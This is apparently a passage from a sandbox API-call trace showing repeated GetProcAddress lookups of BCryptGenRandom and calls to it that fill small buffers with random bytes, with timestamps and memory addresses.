lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.441] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.441] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0189.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d6327, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x4d6327) returned 0x0 [0189.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0189.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.450] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.450] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.451] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.451] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.451] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.452] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.452] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.452] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.452] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.453] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.453] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.453] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.453] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.453] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.454] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.454] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.454] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.455] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.455] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.455] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.456] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.456] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.456] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0189.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d6357, cbBuffer=0x26, dwFlags=0x2 | out: pbBuffer=0x4d6357) returned 0x0 [0189.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0189.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0189.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0189.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d637d, cbBuffer=0x31, dwFlags=0x2 | out: pbBuffer=0x4d637d) returned 0x0 [0189.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0189.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.471] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.471] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.471] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.472] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.472] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.472] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, 